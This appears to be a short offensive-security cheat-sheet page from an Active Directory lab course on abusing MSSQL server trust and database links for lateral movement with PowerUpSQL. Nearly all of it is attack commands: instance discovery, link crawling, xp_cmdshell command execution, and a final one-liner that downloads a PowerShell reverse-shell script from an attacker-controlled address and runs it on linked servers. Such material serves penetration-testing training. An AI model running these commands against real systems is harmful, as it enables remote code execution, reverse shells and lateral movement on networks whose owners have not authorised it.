Trust Abuse - MSSQL Servers

MS SQL servers are generally deployed in plenty in a Windows domain.
SQL Servers provide very good options for lateral movement as domain users can be mapped to database roles
For MSSQL and PowerShell hackery, lets use PowerUpSQL https://github.com/NetSPI/PowerUpSQL

MSSQL Servers

#Discovery (SPN Scanning)
Get-SQLInstanceDomain

#Check Accessibility
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

#Gather Information
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

#Look for links to remote servers
Get-SQLServerLink -Instance dcorp-mssql -Verbose


#Enumerating Database Links
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose


#Executing Commands
Get-SQLServerLinkCrawl -Instance dcorp-mssql "exec master..xp_cmdshell 'whoami'"

#Execute a PowerShell download execute cradle to execute a PowerShell reverse shell:
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http:// 172.16.100.X/Invoke-PowerShellTcp.ps1'')"'

PreviousForest Persistence – DCShadow NextPriv Esc – Across Forest using krbtgt Ticket

Last updated 4 years ago

Was this helpful?